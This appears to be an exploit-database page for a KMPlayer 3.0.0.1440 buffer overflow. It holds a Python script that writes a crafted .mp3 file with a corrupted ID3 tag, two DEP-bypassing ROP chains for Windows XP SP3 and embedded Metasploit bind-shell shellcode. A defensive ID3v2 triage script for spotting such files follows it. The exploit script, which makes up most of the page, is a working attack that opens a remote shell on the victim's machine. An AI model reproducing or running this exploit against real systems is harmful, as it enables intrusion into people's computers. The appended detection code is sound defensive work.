0day.today - Biggest Exploit Database in the World.
The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.

import os

evilfile = "km_pwn.mp3"

# Corrupted ID3v2 tag that triggers the overflow (one long literal, kept on one line)
head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"

cruft = "\x85" * 3162

nops = "\x90" * 28
nops += "\x91\x90\x90\x90" # The last byte gets decremented in rop2 while pointing EAX at the shellcode
nops += "\x90" * 20

#shellcode = "\xcc" * 368 # Size of bind shell

#root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33"
"\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45"
"\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49"
"\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05"
"\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca"
"\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60"
"\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf"
"\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73"
"\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9"
"\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0"
"\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde"
"\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f"
"\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9"
"\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53"
"\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0"
"\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47"
"\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6"
"\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf"
"\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f"
"\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3"
"\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99"
"\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4"
"\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08"
"\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7")

##################### ROP Chain for VMware Workstation (Linux) and Xen #####################

eip = "\x71\x14\x40\x00" # 00401471 RETN Pivot to the stack
toesp = "\x42" * 4

wpm = "\x13\x22\x80\x7c"  # 7C802213 WriteProcessMemory - XPSP3
wpm += "\x20\x1f\x45\x02" # 02451F20 in_wm.dll - Return after WPM
wpm += "\xff\xff\xff\xff" # hProcess
wpm += "\x10\x1f\x45\x02" # 02451F10 in_wm.dll - Address to Patch
wpm += "\xbe\xba\xfe\xca" # lpBuffer placeholder (Shellcode Address)
wpm += "\xce\xfa\xed\xfe" # nSize placeholder (Shellcode Size)
wpm += "\xc0\x2b\x45\x02" # 02452BC0 in_wm.dll - Pointer for Written Bytes

# Get a copy of ESP into a register
rop1 = "\x4f\x92\x71\x13" # 1371924F : {POP} # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += "\x41" * 12      # Junk to be popped into ESI, EBP, and EBX

junk = "\x61" * 52 # Junk in between our VirtualProtect parameters and the next ROP chain

# Put a copy of the saved ESP from EDI into EAX
rop2 = "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\x41" * 8       # Compensate for the RETN 8 in rop1

# Increase EAX to point at our shellcode
rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)

# Write the address of the shellcode into the lpBuffer placeholder
# First need to put EAX in a safe spot then juggle around EDI to get it to ESI
rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)
rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\xbe\x9c\xca\x76" # 76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
rop2 += "\x41" * 4        # Junk to be popped into ESI

# Get the initial ESP value back into ESI
rop2 += "\xe6\x57\x01\x15" # 150157E6 : {POP} # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
rop2 += "\x41" * 8        # Junk to be popped into EBX and ECX

# Get the initial ESP value back into ESI
rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll)

# Zero EAX and set it to the shellcode size (0x200)
rop2 += "\xc0\x11\x37\x02" # 023711C0 : # XOR EAX,EAX # RETN (in_mp4.dll)
rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4        # Junk to be popped into EBP
rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4        # Junk to be popped into EBP

# Write the shellcode size into the nSize placeholder
rop2 += "\x3f\xcf\x9e\x7c" # 7C9ECF3F : {POP} # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
rop2 += "\x41" * 8        # Junk to be popped into ESI and EBP

# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
rop2 += "\x41\x15\x5d\x77" # 775D1541 : # SUB EAX,4 # RETN (ole32.dll)
rop2 += "\x41" * 4
rop2 += "\x51\xeb\x43\x02" # 0243EB51 : # ADD EAX,0C # RETN (in_wm.dll)
rop2 += "\xce\x05\x42\x02" # 024205CE : {POP} # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
rop2 += "\x41" * 4        # Junk to be popped into ESI
rop2 += "\x41" * 32

############################# ROP Chain for VMware Fusion and ESXi ############################

###############################################################################################
## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
###############################################################################################
#put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
jmp_value = "\xf0\x38\x00\x00"

rop_1 = "\x46"*4
#0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) **
rop_1 += "\x2c\x80\x44\x77"
#0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) **
rop_1 += "\x75\x66\x8a\x5b"
#0x7C926021 : {POP} # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll) **
rop_1 += "\x21\x60\x92\x7c"
rop_1 += "\x50" * 8
#0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) **
rop_1 += "\x09\x15\x45\x7e"
###############################################################################################

filler_a1 = "\x41"*360

###############################################################################################
## ROP_2 = all about the shell
###############################################################################################
######### SAVING STACKPOINTERS ################################################################
#0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) **
rop_2 = "\x2c\x80\x44\x77"
#0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) **
rop_2 += "\x75\x66\x8a\x5b"
#0x5B8A9F1E : # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll) **
rop_2 += "\x1e\x9f\x8a\x5b"
rop_2 += "\x43\x43\x43\x43"

#WriteProcessMemory construct with the two placeholders we need to generate on the fly
###############################################################################################
rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
rop_2 += "\xff\xff\xff\xff" #hProcess
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address)
rop_2 += "\xce\xfa\xed\xfe" #nSize placeholder (Shellcode Size)
rop_2 += "\10\x20\x98\x7c"  #writeable location in ntdll (octal \10 as in the original)
###############################################################################################

######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)###############################
#gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x44" * 40
#0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44" *32
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44"*4
#0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) **
rop_2 += "\x8d\xda\x45\x7e"
#0x77DD994E : # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll) **
rop_2 += "\x4e\x99\xdd\x77"
#0x7C910C66 : # XCHG EAX,ESI # RETN 2 (ntdll.dll) **
rop_2 += "\x66\x0c\x91\x7c"
#padding
rop_2 += "\x44" * 2
#0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) **
rop_2 += "\x8d\xda\x45\x7e"
#padding
rop_2 += "\x44"*2
#0x76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) **
rop_2 += "\xbe\x9c\xca\x76"
###############################################################################################

######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ##################################
#gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x47" *4
#0x775D156E : # PUSH EAX # POP ESI # RETN (ole32.dll) **
rop_2 += "\x6e\x15\x5d\x77"
#0x7E433785 : # XOR EAX,EAX # RETN 4 (USER32.dll) **
rop_2 += "\x85\x37\x43\x7e"
#0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*8
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*4
#0x75D0AA2E : # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll) **
rop_2 += "\x2e\xaa\xd0\x75"
###############################################################################################

###############################################################################################
######### Realigning EAX to point to WPM and setting ESP to it ################################
rop_2 += "\x50" * 4
#0x76CAF118 : # ADD EAX,0C # RETN (IMAGEHLP.dll) **
rop_2 += "\x18\xf1\xca\x76"
#0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) **
rop_2 += "\x09\x15\x45\x7e"
rop_2 += "\x43"*316
###############################################################################################

##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
#slide into the shell
nops_7 = "\x90"*56
#after the shell
filler_a2 = "\x42" * (3200)
###############################################################################################

############################# PUTTING IT TOGETHER #############################################
filler_a = filler_a1 + rop_2 + nops_7 + shellcode + filler_a2
#small buffer filler
filler_b = "\x44" * (95)
#the whole shebang (ronin's version)
filler = filler_a + jmp_value + eip + rop_1 + filler_b
###############################################################################################

sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler

# Write in binary mode so no newline translation corrupts the bytes on Windows
crashy = open(evilfile, "wb")
crashy.write(sploit)
crashy.close()

# 0day.today [2024-12-24] #
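The crafted file assembled above is recognisable from its layout alone: the first three bytes of `head` are "wD7" rather than the "ID3" magic an ID3v2 tag starts with, the tag is followed by thousands of identical filler bytes (`cruft`, `filler_a1`, `filler_a2`), and runs of 0x90 NOPs sit in front of the payload. The script below is an added defensive triage example, not part of the original exploit or of the 0day.today page. It parses the ID3v2 header the way a strict reader would (magic, version, sync-safe size) and reports long single-byte runs and NOP sleds. The two sample blobs are constructed here and only mimic the shape of the filler and sled regions; the `RUN_THRESHOLD` and `SLED_THRESHOLD` values are assumptions chosen for illustration.

```python
"""Heuristic triage of .mp3 / ID3v2 files for crafted-input artifacts.

Added defensive example; samples are constructed, thresholds are assumptions.
"""
from typing import List, Tuple

RUN_THRESHOLD = 256   # assumption: one byte repeated this often is filler, not audio
SLED_THRESHOLD = 16   # assumption: this many 0x90 bytes in a row looks like a NOP sled


def parse_id3v2_header(data: bytes) -> dict:
    """Parse the 10-byte ID3v2 header and record every structural problem found."""
    problems, version, tag_size = [], None, None
    if len(data) < 10:
        problems.append("file shorter than an ID3v2 header")
    elif data[:3] != b"ID3":
        problems.append("missing/corrupt ID3 magic: %r" % data[:3])
    else:
        major, revision, size_bytes = data[3], data[4], data[6:10]
        version = (major, revision)
        if major not in (2, 3, 4) or revision == 0xFF:
            problems.append("unsupported ID3v2 version %d.%d" % (major, revision))
        # The tag size is sync-safe: four bytes carrying seven significant bits each.
        if any(b & 0x80 for b in size_bytes):
            problems.append("tag size bytes are not sync-safe (high bit set)")
        tag_size = 0
        for b in size_bytes:
            tag_size = (tag_size << 7) | (b & 0x7F)
        if 10 + tag_size > len(data):
            problems.append("declared tag size %d exceeds file length %d" % (tag_size, len(data)))
    return {"valid": not problems, "version": version, "tag_size": tag_size, "problems": problems}


def find_byte_runs(data: bytes, threshold: int = RUN_THRESHOLD) -> List[Tuple[int, int, int]]:
    """Return (offset, byte_value, length) for every run of one byte at least `threshold` long."""
    runs, i, n = [], 0, len(data)
    while i < n:
        j = i + 1
        while j < n and data[j] == data[i]:
            j += 1
        if j - i >= threshold:
            runs.append((i, data[i], j - i))
        i = j
    return runs


def triage(data: bytes) -> dict:
    """Combine the checks into one verdict. A heuristic for analyst triage, not a signature."""
    header = parse_id3v2_header(data)
    long_runs = find_byte_runs(data, RUN_THRESHOLD)
    nop_sled = any(value == 0x90 for _, value, _ in find_byte_runs(data, SLED_THRESHOLD))
    return {
        "header_problems": header["problems"],
        "long_runs": long_runs,
        "nop_sled": nop_sled,
        "suspicious": bool(header["problems"] or long_runs or nop_sled),
    }


# Constructed benign sample: valid ID3v2.3 header, one TIT2 frame, then varied "audio" bytes.
_TIT2_FRAME = b"TIT2" + (6).to_bytes(4, "big") + b"\x00\x00" + b"\x00hello"   # 16 bytes
BENIGN_SAMPLE = (b"ID3\x03\x00\x00" + b"\x00\x00\x00\x10" + _TIT2_FRAME
                 + b"\xff\xfb" + bytes(range(256)) * 2)

# Constructed suspicious sample: mangled magic, a big filler run, a NOP sled, more filler.
CRAFTED_SAMPLE = b"wD7\x03" + b"\x00" * 6 + b"\x85" * 3162 + b"\x90" * 48 + b"\x41" * 360


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_SAMPLE), ("crafted", CRAFTED_SAMPLE)):
        print(name, triage(blob))
```

Run it over a quarantined media attachment before it reaches a player, and read the output as a reason to look closer rather than as a verdict: a legitimate file with a long block of silence or zero padding can trip `RUN_THRESHOLD` on its own, while the magic and sync-safe checks are the higher-confidence signals because a genuine tagger never emits them wrong.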